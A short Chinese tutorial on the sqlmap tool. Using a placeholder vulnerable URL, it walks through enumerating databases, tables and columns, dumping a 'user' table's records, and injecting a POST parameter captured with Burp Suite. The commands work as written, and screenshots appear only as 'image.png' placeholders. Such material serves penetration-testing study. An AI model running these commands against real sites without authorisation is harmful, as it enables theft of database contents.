sqlmap使用

环境准备:

假设存在sql注入的url是

 http://www.test.com/fu?id=111

一、基于mysql注入

a、sqlmap注入爆数据库

python sqlmap.py -u "http://www.test.com/fu?id=111" --dbs

如下图显示，即爆出数据库信息

image.png

b、查找对应数据库下面的表

这里以上面blog数据库的表为例

python sqlmap.py -u "http://www.test.com/fu?id=111"  -D blog --tables

即可爆出blog数据库中所有的表

image.png

c、爆出对应表的列名

这里以上面的user表为例

python sqlmap.py -u "http://www.test.com/fu?id=111"  -D blog -T user --columns

即可爆出所有的列名

image.png

d、爆出表的所有记录

这里以上面的user表为例

python sqlmap.py -u "http://www.test.com/fu?id=111"  -D blog -T user -C "age,id,name,sex" --dump

即可爆出所有记录

image.png

二、基于post注入

假设对应的sql注入字段是 search_key

a、通过burpsuite截取请求数据

image.png
image.png

b、把此数据保存为test.cookie，名字可随便取

让sqlmap加载此文件，进行注入

sqlmap.py -r test.cookie -p search_key --dbs

其中的 -p 是指定 search_key 为注入参数